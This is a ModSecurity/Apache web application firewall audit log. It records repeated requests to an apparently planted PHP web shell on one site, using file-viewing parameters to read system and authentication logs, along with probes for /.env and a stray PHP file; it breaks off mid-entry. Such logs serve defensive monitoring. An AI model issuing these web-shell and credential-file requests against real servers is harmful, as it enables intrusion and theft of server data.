Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa5eba6d-Z-- --a0a50375-A-- [15/Jun/2025:12:30:12.826367 +0530] aE5vfJoX9bs_jrDBLBFkhQAAAAA 216.73.216.83 57898 127.0.0.1 7081 --a0a50375-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fsyslog.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a0a50375-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2942 Connection: close Content-Type: text/html; charset=UTF-8 --a0a50375-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vfJoX9bs_jrDBLBFkhQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970812822439 3989 (- - -) Stopwatch2: 1749970812822439 3989; combined=2116, p1=343, p2=1647, p3=33, p4=33, p5=60, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0a50375-Z-- --80230d52-A-- [15/Jun/2025:12:30:13.009044 +0530] aE5vfbaxs8_oWLL8MgpCtAAAAAY 216.73.216.83 57922 127.0.0.1 7081 --80230d52-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fauth.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --80230d52-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --80230d52-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vfbaxs8_oWLL8MgpCtAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970813004765 4333 (- - -) Stopwatch2: 1749970813004765 4333; combined=2224, p1=393, p2=1693, p3=37, p4=41, p5=60, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80230d52-Z-- --0d76d073-A-- [15/Jun/2025:12:30:50.895359 +0530] aE5vonxTls_n68HhJPDVSQAAAAE 216.73.216.83 56764 127.0.0.1 7081 --0d76d073-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmaillog.processed.1.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0d76d073-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --0d76d073-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vonxTls_n68HhJPDVSQAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970850890449 4990 (- - -) Stopwatch2: 1749970850890449 4990; combined=2683, p1=283, p2=2237, p3=42, p4=44, p5=77, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d76d073-Z-- --e8064f64-A-- [15/Jun/2025:12:30:50.918292 +0530] aE5vonxTls_n68HhJPDVSgAAAAE 216.73.216.83 56800 127.0.0.1 7081 --e8064f64-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmaillog.processed.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e8064f64-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2955 Connection: close Content-Type: text/html; charset=UTF-8 --e8064f64-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vonxTls_n68HhJPDVSgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970850914414 3931 (- - -) Stopwatch2: 1749970850914414 3931; combined=2121, p1=328, p2=1666, p3=34, p4=37, p5=56, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e8064f64-Z-- --71c20a6b-A-- [15/Jun/2025:12:31:36.715871 +0530] aE5v0D8QAuiw8zL7QHNwKQAAAAU 216.73.216.83 33504 127.0.0.1 7081 --71c20a6b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmail.err HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --71c20a6b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2943 Connection: close Content-Type: text/html; charset=UTF-8 --71c20a6b-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5v0D8QAuiw8zL7QHNwKQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970896711956 3980 (- - -) Stopwatch2: 1749970896711956 3980; combined=2128, p1=341, p2=1662, p3=36, p4=34, p5=55, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --71c20a6b-Z-- --062b3404-A-- [15/Jun/2025:12:31:37.353520 +0530] aE5v0RBbAfjIOuFq7fostgAAAAw 216.73.216.83 33588 127.0.0.1 7081 --062b3404-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmaillog.processed.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --062b3404-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --062b3404-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5v0RBbAfjIOuFq7fostgAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970897349593 3980 (- - -) Stopwatch2: 1749970897349593 3980; combined=2183, p1=347, p2=1711, p3=35, p4=32, p5=58, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --062b3404-Z-- --9887856e-A-- [15/Jun/2025:12:31:37.716603 +0530] aE5v0XxTls_n68HhJPDVZgAAAAE 216.73.216.83 33644 127.0.0.1 7081 --9887856e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fkern.log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9887856e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2943 Connection: close Content-Type: text/html; charset=UTF-8 --9887856e-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5v0XxTls_n68HhJPDVZgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970897712710 3956 (- - -) Stopwatch2: 1749970897712710 3956; combined=2052, p1=344, p2=1578, p3=34, p4=35, p5=61, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9887856e-Z-- --0e47d55a-A-- [15/Jun/2025:12:32:19.412899 +0530] aE5v-7uLyDaLfLFz1OBTcAAAAAs 162.158.38.206 36138 127.0.0.1 7081 --0e47d55a-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.getcalley.com X-Real-IP: 162.158.38.206 X-Forwarded-For: 52.169.17.49 Connection: close cf-ray: 9500338119201b79-DUB cf-visitor: {"scheme":"https"} cf-ipcountry: IE accept-encoding: gzip, br x-forwarded-proto: https cf-connecting-ip: 52.169.17.49 cdn-loop: cloudflare; loops=1 --0e47d55a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13867 Connection: close Content-Type: text/html; charset=UTF-8 --0e47d55a-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.getcalley.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE5v-7uLyDaLfLFz1OBTcAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749970939128099 284887 (- - -) Stopwatch2: 1749970939128099 284887; combined=2183, p1=435, p2=1637, p3=0, p4=0, p5=111, sr=186, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0e47d55a-Z-- --e2b25b46-A-- [15/Jun/2025:12:33:02.277720 +0530] aE5wJj8QAuiw8zL7QHNwWAAAAAU 216.73.216.83 51976 127.0.0.1 7081 --e2b25b46-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmail.err.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e2b25b46-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --e2b25b46-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wJj8QAuiw8zL7QHNwWAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970982272279 5835 (- - -) Stopwatch2: 1749970982272279 5835; combined=3021, p1=435, p2=2400, p3=52, p4=46, p5=88, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2b25b46-Z-- --5100bf76-A-- [15/Jun/2025:12:33:09.576117 +0530] aE5wLEXkwk4bH3TYJTbAwQAAAAQ 102.97.197.16 52352 127.0.0.1 7081 --5100bf76-B-- GET /.env HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 102.97.197.16 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --5100bf76-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" Set-Cookie: _sfs_id=fd2bb01364f1e18b0cd0b6594a6ccdc61749970989; expires=Sun, 15 Jun 2025 08:03:09 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --5100bf76-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.mindscan.edu.in"] [uri "/.env"] [unique_id "aE5wLEXkwk4bH3TYJTbAwQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749970988568568 1007644 (- - -) Stopwatch2: 1749970988568568 1007644; combined=1969, p1=392, p2=1472, p3=0, p4=0, p5=104, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5100bf76-Z-- --68c38e3f-A-- [15/Jun/2025:12:34:04.002977 +0530] aE5wY29G5GX-FYRCUwHtwAAAABA 216.73.216.83 50332 127.0.0.1 7081 --68c38e3f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmail.err.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --68c38e3f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --68c38e3f-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wY29G5GX-FYRCUwHtwAAAABA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971043998147 4902 (- - -) Stopwatch2: 1749971043998147 4902; combined=2714, p1=315, p2=2247, p3=45, p4=45, p5=62, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68c38e3f-Z-- --3be75d17-A-- [15/Jun/2025:12:34:04.014347 +0530] aE5wZHxTls_n68HhJPDVsgAAAAE 216.73.216.83 50334 127.0.0.1 7081 --3be75d17-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fkern.log.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3be75d17-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --3be75d17-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wZHxTls_n68HhJPDVsgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971044010250 4151 (- - -) Stopwatch2: 1749971044010250 4151; combined=2223, p1=372, p2=1720, p3=35, p4=35, p5=61, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3be75d17-Z-- --716f1b0a-A-- [15/Jun/2025:12:34:04.661065 +0530] aE5wZJX6T5jLdIl-tq40XgAAAAM 216.73.216.83 50400 127.0.0.1 7081 --716f1b0a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fsyslog.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --716f1b0a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2947 Connection: close Content-Type: text/html; charset=UTF-8 --716f1b0a-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5wZJX6T5jLdIl-tq40XgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749971044656618 4510 (- - -) Stopwatch2: 1749971044656618 4510; combined=2441, p1=412, p2=1879, p3=47, p4=46, p5=57, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --716f1b0a-Z-- --9c5ee51d-A-- [15/Jun/2025:12:34:05.311710 +0530] aE5wZRpvTPvjcsG3xaop6wAAAAI 216.73.216.83 50484 127.0.0.1 7081 --9c5ee51d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmail.err.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 